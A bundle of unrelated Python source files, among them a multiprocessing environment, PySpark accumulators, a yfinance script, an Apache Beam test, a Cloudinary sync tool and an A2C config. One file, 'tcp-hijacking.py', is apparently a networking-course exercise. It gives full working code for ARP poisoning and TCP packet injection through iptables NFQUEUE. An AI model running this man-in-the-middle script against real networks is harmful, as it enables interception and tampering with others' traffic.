for shm, ob in zip(self.shm, obs + [0, 0]):
np.copyto(dst=shm[self.idx], src=ob)
self.w_conn.send(DONE)
elif msg == STOP:
self._env.stop()
self.w_conn.close()
break
class ShmMultiProcEnv(Env):
"""
Parallel environments via multiprocessing + shared memory
"""
def __init__(self, envs):
super().__init__(envs[0].id)
self.shm = [make_shared(len(envs), s) for s in envs[0].obs_spec().spaces]
self.shm.append(make_shared(len(envs), Space((1,), name="reward")))
self.shm.append(make_shared(len(envs), Space((1,), name="done")))
self.envs = [ShmProcEnv(env, idx, self.shm) for idx, env in enumerate(envs)]
def start(self):
for env in self.envs:
env.start()
self.wait()
def step(self, actions):
for idx, env in enumerate(self.envs):
env.step([a[idx] for a in actions])
return self._observe()
def reset(self):
for e in self.envs:
e.reset()
return self._observe()
def _observe(self):
self.wait()
obs = self.shm[:-2]
reward = np.squeeze(self.shm[-2], axis=-1)
done = np.squeeze(self.shm[-1], axis=-1)
return obs, reward, done
def stop(self):
for e in self.envs:
e.stop()
for e in self.envs:
e.proc.join()
def wait(self):
return [e.wait() for e in self.envs]
def obs_spec(self):
return self.envs[0].obs_spec()
def act_spec(self):
return self.envs[0].act_spec()
def make_shared(n_envs, obs_space):
shape = (n_envs, ) + obs_space.shape
raw = RawArray(to_ctype(obs_space.dtype), int(np.prod(shape)))
return np.frombuffer(raw, dtype=obs_space.dtype).reshape(shape)
def to_ctype(_type):
types = {
np.bool: ctypes.c_bool,
np.int8: ctypes.c_byte,
np.uint8: ctypes.c_ubyte,
np.int32: ctypes.c_int32,
np.int64: ctypes.c_longlong,
np.uint64: ctypes.c_ulonglong,
np.float32: ctypes.c_float,
np.float64: ctypes.c_double,
}
if isinstance(_type, np.dtype):
_type = _type.type
return types[_type]
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError:...
"""
import sys
import select
import struct
if sys.version < '3':
import SocketServer
else:
import socketserver as SocketServer
import threading
from pyspark.cloudpickle import CloudPickler
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the C{+=}
operator, but only the driver program is allowed to access its value, using C{value}.
Updates from the workers get propagated automatically to the driver program.
While C{SparkContext} supports accumulators for primitive data types like C{int} and
C{float}, users can also define accumulators for custom types by providing a custom
L{AccumulatorParam} object. Refer to the doctest of this module for an example.
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided C{value} (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update C{value1} in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
class AccumulatorServer(SocketServer.TCPServer):
"""
A simple TCP server that intercepts shutdown() in order to interrupt
our continuous polling on the handler.
"""
server_shutdown = False
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server():
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
doctest.testmod()
|
main_yfinance.py
|
'''
Libraries
'''
# External libraries
import yfinance as yf #Librarie to connect to Yahoo Finance
#Edited : Add to line 286-292 in base.py of yfinance (https://github.com/ranaroussi/yfinance/issues/208)
#Edited: Comment line 319 in base.py of yfinance because of the error self._info['regularMarketPrice'] = self._info['regularMarketOpen'] KeyError: 'regularMarketOpen'
# General Libraries
import json
import sys
import threading #Librarie for threads
import time #Librarie for time purposes
# Libraries from the project
import stock as stk
'''
Functions
'''
# Read file with all stock symbols in the market (The file should be updated, but unfortunately just have one request to the api for month )
def fileReadSymbolStocks():
f = open("Files/StockList.txt", "r")
p = json.loads(f.read())
f.close()
return p
# Creating objects of a stock, with Symbol that identifies the stock and the ticker for doing the request.
def creatingStocks(symbol):
for x in symbolStock:
stocks.append(stk.stock(x, yf.Ticker(x)))
'''
Get Functions
'''
# General info of a stock
def getStockInfo(stock):
return stock.getTicker().info
# Historical Market Data of a Stock
def getStockHistoricalMarketData(stock):
return stock.getTicker().history(period = "max", threads = False)
# Actions (Dividends, splits) of a stock
def getStockActions(stock):
return (stock.getTicker().actions)
# Dividends of a stock
def getStockDividends(stock):
return (stock.getTicker().dividends)
# Splits of a stock
def getStockSplits(stock):
return (stock.getTicker().splits)
# Financials of a stock
def getStockFinancials(stock):
return (stock.getTicker().financials)
# Quarterly financials of a stock
def getStockQuarterlyFinancials(stock):
return (stock.getTicker().quarterly_financials)
# Major holders of a stock
def getStockMajorHolders(stock):
return (stock.getTicker().major_holders)
# Institutional holders of a stock
def getStockInstitutionalHolders(stock):
return (stock.getTicker().institutional_holders)
# Balance sheet of a stock
def getStockBalanceSheet(stock):
return (stock.getTicker().balance_sheet)
# Quartely Balance sheet of a stock
def getStockQuarterlyBalanceSheet(stock):
return (stock.getTicker().quarterly_balance_sheet)
# Cashflow of a stock
def getStockCashFlow(stock):
return (stock.getTicker().cashflow)
# Quarterly Cashflow of a stock
def getStockQuarterlyCashFlow(stock):
return (stock.getTicker().quarterly_cashflow)
# Earnings of a stock
def getStockEarnings(stock):
return (stock.getTicker().earnings)
# Quarterly Earnings of a stock
def getStockQuarterlyEarnings(stock):
return (stock.getTicker().quarterly_earnings)
# Sustainability of a stock
def getStockSustainability(stock):
return (stock.getTicker().sustainability)
# Analysts recommendations of a stock
def getStockAnalystsRecommendations(stock):
return (stock.getTicker().recommendations)
# Next event (earnings, etc) of a stock
def getStockCalendar(stock):
return (stock.getTicker().calendar)
# get ISIN code - *experimental* of a stock
# ISIN = International Securities Identification Number
def getStock_ISIN_code(stock):
return (stock.getTicker().isin)
# get options expirations of a stock
def getStockOptions(stock):
return (stock.getTicker().options)
'''
Print to the screen Functions
'''
# Version of the Yfinance
def versionYfinance():
print('Yfinance = version = ' + yf.__version__)
''' Missing this one chapter '''
# get option chain for specific expiration
#opt = msft.option_chain('YYYY-MM-DD')
# data available via: opt.calls, opt.puts
# Menu options
def showMenu():
print("Menu")
print("1 - Show stock info")
print("2 - Show historical Market Data")
print("3 - Show Actions (dividends, splits)")
print("4 - Show dividends")
print("5 - Show splits")
print("6 - Show financials")
print("7 - Show major holders")
print("8 - Show Institutional holders")
print("9 - Show balance sheet")
print("10 - Show Cashflow")
print("11 - Show earnings")
print("12 - Show sustainability")
print("13 - Show analysys recommendations")
print("14 - Show next event (earnings, etc)")
print("15 - Show ISIN code")
print("Option: ")
'''
Handlers
'''
# Menu Handler
def menu():
run = True
while (run):
showMenu()
option = int(sys.stdin.readline())
if (option == 0):
run = False
exit(0)
elif (option == 1):
print("Stock Info")
print(getStockInfo(stocks[0]))
elif (option == 2):
print("Historical market data")
print(getStockHistoricalMarketData(stocks[0]))
elif (option == 3):
print("Actions (Dividends, splits)")
print(getStockActions(stocks[0]))
elif (option == 4):
print("Dividends")
print(getStockDividends(stocks[0]))
elif (option == 5):
print("Splits")
print(getStockSplits(stocks[0]))
elif (option == 6):
print("Financials")
print(getStockFinancials(stocks[1]))
print(getStockQuarterlyFinancials(stocks[2]))
elif (option == 7):
print("Major holders")
print(getStockMajorHolders(stocks[0]))
elif (option == 8):
print("Institutional holders")
print(getStockInstitutionalHolders(stocks[0]))
elif (option == 9):
print("Balance Sheet")
print(getStockBalanceSheet(stocks[0]))
print(getStockQuarterlyBalanceSheet(stocks[0]))
elif (option == 10):
print("Cashflow")
print(getStockCashFlow(stocks[0]))
print(getStockQuarterlyCashFlow(stocks[0]))
elif (option == 11):
print("Earnings")
print(getStockEarnings(stocks[0]))
print(getStockQuarterlyEarnings(stocks[0]))
elif (option == 12):
print("Sustainability")
print(getStockSustainability(stocks[0]))
elif (option == 13):
print("Analysys recommendations")
print(getStockAnalystsRecommendations(stocks[0]))
elif (option == 14):
print("Next event (earnings, etc)")
print(getStockCalendar(stocks[0]))
elif(option == 15):
print("ISIS code")
print(getStock_ISIN_code(stocks[0]))
else:
print("Not a valid option!")
time.sleep(5)
'''
Variables
'''
# Global Variables
stocks = [] # Array of Object's Stock
symbolStock = fileReadSymbolStocks() # All Symbol Stocks read from the file
versionYfinance() # Function that prints the version that it's operating
'''
MAIN LOGIC
'''
t = threading.Thread(target = creatingStocks, args = (symbolStock,)) #Thread for creating objects
t.daemon = True # Needed for when the program shut's down, the thread stops
t.start() #initializes the thread
menu() # initializes the menu
|
subprocess_server_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Unit tests for the processes module."""
# pytype: skip-file
from __future__ import absolute_import
import os
import re
import shutil
import socketserver
import tempfile
import threading
import unittest
# patches unittest.TestCase to be python3 compatible
import future.tests.base # pylint: disable=unused-import
from apache_beam.utils import subprocess_server
# TODO(Py3): Use tempfile.TemporaryDirectory
class TemporaryDirectory:
def __enter__(self):
self._path = tempfile.mkdtemp()
return self._path
def __exit__(self, *args):
shutil.rmtree(self._path, ignore_errors=True)
class JavaJarServerTest(unittest.TestCase):
def test_gradle_jar_release(self):
self.assertEqual(
'https://repo.maven.apache.org/maven2/org/apache/beam/'
'beam-sdks-java-fake/VERSION/beam-sdks-java-fake-VERSION.jar',
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', version='VERSION'))
self.assertEqual(
'https://repo.maven.apache.org/maven2/org/apache/beam/'
'beam-sdks-java-fake/VERSION/beam-sdks-java-fake-A-VERSION.jar',
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', appendix='A', version='VERSION'))
def test_gradle_jar_dev(self):
with self.assertRaisesRegex(
Exception,
re.escape(os.path.join('sdks',
'java',
'fake',
'build',
'libs',
'beam-sdks-java-fake-VERSION-SNAPSHOT.jar')) +
' not found.'):
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', version='VERSION.dev')
with self.assertRaisesRegex(
Exception,
re.escape(os.path.join('sdks',
'java',
'fake',
'build',
'libs',
'beam-sdks-java-fake-A-VERSION-SNAPSHOT.jar')) +
' not found.'):
subprocess_server.JavaJarServer.path_to_beam_jar(
'sdks:java:fake:fatJar', appendix='A', version='VERSION.dev')
def test_local_jar(self):
class Handler(socketserver.BaseRequestHandler):
timeout = 1
def handle(self):
self.request.recv(1024)
self.request.sendall(b'HTTP/1.1 200 OK\n\ndata')
port, = subprocess_server.pick_port(None)
server = socketserver.TCPServer(('localhost', port), Handler)
t = threading.Thread(target=server.handle_request)
t.daemon = True
t.start()
with TemporaryDirectory() as temp_dir:
subprocess_server.JavaJarServer.local_jar(
'http://localhost:%s/path/to/file.jar' % port, temp_dir)
with open(os.path.join(temp_dir, 'file.jar')) as fin:
self.assertEqual(fin.read(), 'data')
if __name__ == '__main__':
unittest.main()
|
tcp-hijacking.py
|
from scapy.all import ARP, TCP, send, sr, IP, Raw
import os
import sys
import threading
import time
from netfilterqueue import NetfilterQueue as NFQ
# constante si variabile globale -------------------------------------------------------------------------------------------
CLIENT_IP = '172.10.0.2'
SERVER_IP = '198.10.0.2'
seq_nr_mask = dict()
seq_nr_unmask = dict()
#ARP Poison parameters
gateway_ip = "198.10.0.1"
target_ip = "198.10.0.2"
packet_count = 1000
# lungime 23
HACK_MESSAGE = b'You just got haxxed -> '
# Gata constante si variabile globale -------------------------------------------------------------------------------------
# Functie care primeste un IP, si trimite face broadcast unui pachet de tip ARP pentru
# a aflat adresa MAC a adresei respective. Returneaza adresa MAC respectiva, sau None
# daca ia timeout request-ul
def get_mac(ip_address):
# Construim pachetul ARP, cu codul de operatie 1 (who-has)
# si folosim functia sr (Send and Receive) pentru a trimite request-ul si a astepta raspunsul
response, _ = sr(ARP(op=1, pdst=ip_address), retry=2, timeout=10)
for _, packet in response:
return packet[ARP].hwsrc
return None
# Restabilim reteaua prin faptul ca facem broadcast cu pachete cu opcode = 2 (is-at)
# cu adresele MAC reale pentru gateway si target (server in cazul nostru)
def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
send(ARP(op = 2, pdst = gateway_ip, hwsrc = target_mac, psrc = target_ip), count = 5)
send(ARP(op = 2, pdst = target_ip, hwsrc = gateway_mac, psrc = gateway_ip), count = 5)
# Un loop infinit care face broadcast unui pachet care sa amageasca reteaua in legatura cu adresa MAC
# a router-ului, si a unui pachet care sa amageasca reteaua in legatura cu adresa MAC a target-ului
def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
print("[*] Am pornit atacul de tip ARP poison [CTRL-C pentru a opri]")
try:
while True:
send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip))
send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip))
time.sleep(2)
except KeyboardInterrupt:
print("[*] Oprim atacul de ARP Poison. Restabilim reteaua...")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
def alter_packet(packet):
'''Implementați asta ca exercițiu.
# !atentie, trebuie re-calculate campurile len si checksum
'''
global seq_nr_mask, seq_nr_unmask
new_seq_nr = packet[TCP].seq
if new_seq_nr in seq_nr_mask:
new_seq_nr = seq_nr_mask[new_seq_nr]
new_ack_nr = packet[TCP].ack
if new_ack_nr in seq_nr_unmask:
new_ack_nr = seq_nr_unmask[new_ack_nr]
if packet.haslayer(Raw):
current_len = len(packet[Raw].load)
total_len = current_len + len(HACK_MESSAGE)
seq_nr_mask[packet[TCP].seq + current_len] = new_seq_nr + total_len
seq_nr_unmask[new_seq_nr + total_len] = packet[TCP].seq + current_len
new_packet = IP(
src = packet[IP].src,
dst = packet[IP].dst
) / TCP (
seq = new_seq_nr,
ack = new_ack_nr,
sport = packet[TCP].sport,
dport = packet[TCP].dport,
flags = packet[TCP].flags
) / (HACK_MESSAGE + packet[Raw].load)
print('Pachet dupa:')
new_packet.show2()
send(new_packet)
return
new_packet = IP(
src = packet[IP].src,
dst = packet[IP].dst
) / TCP (
seq = new_seq_nr,
ack = new_ack_nr,
sport = packet[TCP].sport,
dport = packet[TCP].dport,
flags = packet[TCP].flags
)
print('Pachet dupa:')
new_packet.show2()
send(new_packet)
return
def process(packet):
octeti = packet.get_payload()
scapy_packet = IP(octeti)
if not scapy_packet.haslayer(TCP):
packet.accept()
return
print("Pachet initial:")
scapy_packet.show2()
alter_packet(scapy_packet)
if __name__ == '__main__':
print("[*] Porneste script-ul...")
print(f"[*] Gateway IP address: {gateway_ip}")
print(f"[*] Target IP address: {target_ip}")
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print("[!] Nu putem afla adresa MAC a gateway. Inchidem...")
sys.exit(0)
else:
print(f"[*] Gateway MAC address: {gateway_mac}")
target_mac = get_mac(target_ip)
if target_mac is None:
print("[!] Nu putem afla adresa MAC a target. Inchidem...")
sys.exit(0)
else:
print(f"[*] Target MAC address: {target_mac}")
# Pornim un thread separat care sa se ocupe de interpunerea intre target si gateway
poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
queue = NFQ()
# Captam pachetele ce trec prin placa noastra de retea, si le scriem intr-un fisier.
try:
sniff_filter = "ip host " + target_ip
print(f"[*] Pornim captarea pachetelor pe placa de retea. Packet Count: {packet_count}. Filter: {sniff_filter}")
print(f"[*] Stopping network capture..Restoring network")
os.system("iptables -I INPUT -j NFQUEUE --queue-num 5")
os.system("iptables -I OUTPUT -j NFQUEUE --queue-num 5")
os.system("iptables -I FORWARD -j NFQUEUE --queue-num 5")
queue.bind(5, process)
queue.run()
os.system('iptables -D FORWARD 1')
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
print(f"[*] Oprim captarea pachetelor. Restabilim reteaua...")
restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
os.system('iptables -D FORWARD 1')
queue.unbind()
sys.exit(0)
|
sync.py
|
from click import command, argument, option
from cloudinary import uploader as _uploader, api, Search
from cloudinary.utils import cloudinary_url as cld_url
from os import walk, sep, remove, rmdir, listdir, mkdir
from os.path import splitext, split, join as path_join, abspath, isdir
from requests import get
from hashlib import md5
from itertools import product
from functools import reduce
from threading import Thread, active_count
from time import sleep
from ..utils import log, F_OK, F_WARN, F_FAIL
@command("sync",
short_help="Synchronize between a local directory and a Cloudinary folder",
help="Synchronize between a local directory and a Cloudinary folder while preserving directory structure")
@argument("local_folder")
@argument("cloudinary_folder")
@option("--push", help="Push will sync the local directory to the Cloudinary directory", is_flag=True)
@option("--pull", help="Pull will sync the Cloudinary directory to the local directory", is_flag=True)
@option("-v", "--verbose", is_flag=True, help="Logs information after each upload")
@option("--expression", help="Search expression used to limit sync")
def sync(local_folder, cloudinary_folder, push, pull, verbose, expression):
if push == pull:
print("Please use either the '--push' OR '--pull' options")
exit(1)
etag = lambda f: md5(open(f, 'rb').read()).hexdigest()
def walk_dir(folder):
all_files = {}
for root, _, files in walk(folder):
for _file in files:
all_files[splitext(path_join(root, _file)[len(folder) + 1:])[0]] = {
"etag": etag(path_join(root, _file)), "path": path_join(root, _file)}
return all_files
def query_cld_folder(folder):
next_cursor = None
items = {}
while True:
search_expr = "{}/*".format(folder)
if expression:
search_expr = "{0} AND {1}".format(search_expr, expression)
res = Search().expression(search_expr).next_cursor(next_cursor).with_field(
"image_analysis").max_results(500).execute()
for item in res['resources']:
items[item['public_id'][len(folder) + 1:]] = {"etag": item['image_analysis']['etag'],
"resource_type": item['resource_type'],
"public_id": item['public_id'], "type": item['type'],
"format": item['format']}
if 'next_cursor' not in res.keys():
break
else:
next_cursor = res['next_cursor']
return items
files = walk_dir(abspath(local_folder))
print("Found {} items in local folder '{}'".format(len(files.keys()), local_folder))
cld_files = query_cld_folder(cloudinary_folder)
print("Found {} items in Cloudinary folder '{}'".format(len(cld_files.keys()), cloudinary_folder))
files_ = set(files.keys())
cld_files_ = set(cld_files.keys())
files_in_cloudinary_nin_local = cld_files_ - files_
files_in_local_nin_cloudinary = files_ - cld_files_
skipping = 0
if push:
files_to_delete_from_cloudinary = list(cld_files_ - files_)
files_to_push = files_ - cld_files_
files_to_check = files_ - files_to_push
print("\nCalculating differences...\n")
for f in files_to_check:
if files[f]['etag'] == cld_files[f]['etag']:
if verbose:
print(F_WARN("{} already exists in Cloudinary".format(f)))
skipping += 1
else:
files_to_push.add(f)
print("Skipping upload for {} items".format(skipping))
if len(files_to_delete_from_cloudinary) > 0:
print("Deleting {} resources from Cloudinary folder '{}'".format(len(files_to_delete_from_cloudinary),
cloudinary_folder))
files_to_delete_from_cloudinary = list(map(lambda x: cld_files[x], files_to_delete_from_cloudinary))
for i in product({"upload", "private", "authenticated"}, {"image", "video", "raw"}):
batch = list(map(lambda x: x['public_id'],
filter(lambda x: x["type"] == i[0] and x["resource_type"] == i[1],
files_to_delete_from_cloudinary)))
if len(batch) > 0:
print("Deleting {} resources with type '{}' and resource_type '{}'".format(len(batch), *i))
counter = 0
while counter * 100 < len(batch) and len(batch) > 0:
counter += 1
res = api.delete_resources(batch[(counter - 1) * 100:counter * 100], invalidate=True,
resource_type=i[1], type=i[0])
num_deleted = reduce(lambda x, y: x + 1 if y == "deleted" else x, res['deleted'].values(), 0)
if verbose:
log(res)
if num_deleted != len(batch):
print(F_FAIL("Failed deletes:\n{}".format("\n".join(list(
map(lambda x: x[0], filter(lambda x: x[1] != 'deleted', res['deleted'].items())))))))
else:
print(F_OK("Deleted {} resources".format(num_deleted)))
to_upload = list(filter(lambda x: split(x)[1][0] != ".", files_to_push))
print("Uploading {} items to Cloudinary folder '{}'".format(len(to_upload), cloudinary_folder))
threads = []
def threaded_upload(options, path, verbose):
res = _uploader.upload(path, **options)
if verbose:
print(F_OK("Uploaded '{}'".format(res['public_id'])))
for i in to_upload:
modif_folder = path_join(cloudinary_folder, sep.join(i.split(sep)[:-1]))
options = {'use_filename': True, 'unique_filename': False, 'folder': modif_folder, 'invalidate': True,
'resource_type': 'auto'}
threads.append(Thread(target=threaded_upload, args=(options, files[i]['path'], verbose)))
for t in threads:
while active_count() >= 30:
# prevent concurrency overload
sleep(1)
t.start()
sleep(1 / 10)
[t.join() for t in threads]
print("Done!")
else:
files_to_delete_local = list(files_in_local_nin_cloudinary)
files_to_pull = files_in_cloudinary_nin_local
files_to_check = cld_files_ - files_to_pull
print("\nCalculating differences...\n")
for f in files_to_check:
if files[f]['etag'] == cld_files[f]['etag']:
if verbose:
print(F_WARN("{} already exists locally".format(f)))
skipping += 1
else:
files_to_pull.add(f)
print("Skipping download for {} items".format(skipping))
def delete_empty_folders(root, verbose, remove_root=False):
if not isdir(root):
return
files = listdir(root)
if len(files):
for f in files:
fullpath = path_join(root, f)
if isdir(fullpath):
delete_empty_folders(fullpath, verbose, True)
files = listdir(root)
if len(files) == 0 and remove_root:
if verbose:
print("Removing empty folder '{}'".format(root))
rmdir(root)
def create_required_directories(root, verbose):
if isdir(root):
return
else:
create_required_directories(sep.join(root.split(sep)[:-1]), verbose)
if verbose:
print("Creating directory '{}'".format(root))
mkdir(root)
print("Deleting {} local files...".format(len(files_to_delete_local)))
for i in files_to_delete_local:
remove(abspath(files[i]['path']))
if verbose:
print("Deleted '{}'".format(abspath(files[i]['path'])))
print("Deleting empty folders...")
delete_empty_folders(local_folder, verbose)
print("Downloading {} files from Cloudinary".format(len(files_to_pull)))
threads = []
def threaded_pull(local_path, verbose, cld_files):
with open(local_path, "wb") as f:
to_download = cld_files[i]
r = get(cld_url(to_download['public_id'], resource_type=to_download['resource_type'],
type=to_download['type'])[0])
f.write(r.content)
f.close()
if verbose:
print(F_OK("Downloaded '{}' to '{}'".format(i, local_path)))
for i in files_to_pull:
local_path = abspath(path_join(local_folder,
i + "." + cld_files[i]['format']
if cld_files[i]['resource_type'] != 'raw' else i))
create_required_directories(split(local_path)[0], verbose)
threads.append(Thread(target=threaded_pull, args=(local_path, verbose, cld_files)))
for t in threads:
while active_count() >= 30:
# prevent concurrency overload
sleep(1)
t.start()
sleep(1 / 10)
[t.join() for t in threads]
print("Done!")
|
a2c.py
|
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing as mp
import os
from collections import namedtuple
from dataclasses import dataclass
from typing import Any, Dict, List, Optional
import gym
import numpy as np
import nnabla as nn
import nnabla_rl.model_trainers as MT
import nnabla_rl.utils.context as context
from nnabla import solvers as NS
from nnabla_rl import environment_explorers as EE
from nnabla_rl.algorithm import Algorithm, AlgorithmConfig, eval_api
from nnabla_rl.builders import ModelBuilder, SolverBuilder
from nnabla_rl.environments.environment_info import EnvironmentInfo
from nnabla_rl.model_trainers.model_trainer import ModelTrainer, TrainingBatch
from nnabla_rl.models import A3CPolicy, A3CSharedFunctionHead, A3CVFunction, StochasticPolicy, VFunction
from nnabla_rl.utils.data import add_batch_dimension, marshal_experiences, set_data_to_variable, unzip
from nnabla_rl.utils.misc import create_variable
from nnabla_rl.utils.multiprocess import (copy_mp_arrays_to_params, copy_params_to_mp_arrays, mp_array_from_np_array,
mp_to_np_array, new_mp_arrays_from_params, np_to_mp_array)
from nnabla_rl.utils.reproductions import set_global_seed
@dataclass
class A2CConfig(AlgorithmConfig):
"""
List of configurations for A2C algorithm
Args:
gamma (float): discount factor of rewards. Defaults to 0.99.
n_steps (int): number of rollout steps. Defaults to 5.
learning_rate (float): learning rate which is set to all solvers. \
You can customize/override the learning rate for each solver by implementing the \
(:py:class:`SolverBuilder <nnabla_rl.builders.SolverBuilder>`) by yourself. \
Defaults to 0.0007.
entropy_coefficient (float): scalar of entropy regularization term. Defaults to 0.01.
value_coefficient (float): scalar of value loss. Defaults to 0.5.
decay (float): decay parameter of Adam solver. Defaults to 0.99.
epsilon (float): epislon of Adam solver. Defaults to 0.00001.
start_timesteps (int): the timestep when training starts.\
The algorithm will collect experiences from the environment by acting randomly until this timestep.
Defaults to 1.
actor_num (int): number of parallel actors. Defaults to 8.
timelimit_as_terminal (bool): Treat as done if the environment reaches the \
`timelimit <https://github.com/openai/gym/blob/master/gym/wrappers/time_limit.py>`_.\
Defaults to False.
max_grad_norm (float): threshold value for clipping gradient. Defaults to 0.5.
seed (int): base seed of random number generator used by the actors. Defaults to 1.
learning_rate_decay_iterations (int): learning rate will be decreased lineary to 0 till this iteration number.
If 0 or negative, learning rate will be kept fixed. Defaults to 50000000.
"""
gamma: float = 0.99
n_steps: int = 5
